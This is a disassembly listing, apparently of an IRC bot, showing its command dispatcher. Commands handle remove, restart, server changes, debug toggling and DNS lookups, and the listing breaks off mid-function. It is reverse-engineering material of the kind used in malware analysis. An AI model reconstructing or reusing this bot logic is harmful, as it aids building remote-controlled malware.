loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41EC10
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EAFC
push offset dword_41EC10
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, off_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41EF18
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41EF18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EAFC
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DA80
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DE00
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41ED18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED18
push offset dword_41DA80
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DE00
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, off_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp dword_41DE08, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov dword_41DE08, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and dword_41DE08, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE00
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE54 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call dword_41DE58 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call dword_41DE5C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE00
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE54 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call dword_41DE58 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call dword_41DE5C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call dword_41DE5C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
